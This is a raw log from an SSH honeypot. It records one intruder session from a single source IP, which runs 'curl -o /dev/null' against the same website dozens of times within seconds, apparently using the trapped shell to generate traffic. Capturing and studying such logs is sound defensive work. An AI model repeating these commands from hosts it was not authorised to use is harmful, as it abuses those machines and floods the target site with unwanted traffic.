{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:16.125285Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:16.163341Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:16.164544Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:16.202726Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:16.204184Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:16.243289Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:16.244550Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:16.284395Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:16.285564Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:16.323298Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:16.324283Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:16.369636Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:16.370824Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:16.458802Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:16.460039Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:16.511789Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:16.513118Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:16.550547Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:16.552229Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:16.590101Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:16.591333Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:16.630983Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:16.632100Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:16.671799Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:16.672966Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:16.712485Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:16.713501Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:16.759516Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:16.760682Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:16.811133Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:16.812314Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:16.851658Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:16.852781Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:16.891545Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:16.892662Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:16.943216Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:16.944253Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:16.987553Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:16.989527Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:17.027138Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:17.028826Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:17.065486Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:17.066485Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:17.103685Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:17.104984Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:17.143391Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:17.144551Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:17.182397Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:17.183573Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:17.225773Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:17.227052Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:17.264008Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:17.265039Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:17.304185Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:17.305210Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:17.351997Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:17.353356Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:17.389758Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:17.390784Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:17.428410Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:17.429391Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:17.590206Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:17.591656Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:17.637178Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:17.638245Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:17.675979Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:17.677146Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:17.714571Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:17.715898Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:17.756799Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:17.757852Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:17.799281Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:17.800365Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:17.839782Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:17.841159Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:18.083327Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:18.084671Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:18.125327Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:18.126688Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:18.163743Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:18.164945Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:18.209729Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:18.210936Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:18.248376Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:18.249695Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:18.290014Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:18.291471Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:18.329250Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:18.330382Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:18.369307Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:18.370478Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:18.408425Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:18.409838Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:18.447077Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:18.448261Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:18.497887Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:18.499264Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:18.536304Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:18.537699Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:18.574814Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:18.576094Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:18.613352Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:18.614626Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:18.651264Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:18.652504Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:18.689040Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:18.690208Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:18.727094Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:18.728337Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:18.765436Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:18.767579Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:18.805249Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:18.806323Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:18.950377Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:18.951682Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:19.000913Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:19.002511Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:19.040053Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:19.041379Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:19.078755Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:19.079839Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:19.116947Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:19.118312Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:19.159240Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:19.160524Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:19.202770Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:19.203848Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:19.242798Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:19.244143Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:19.284909Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
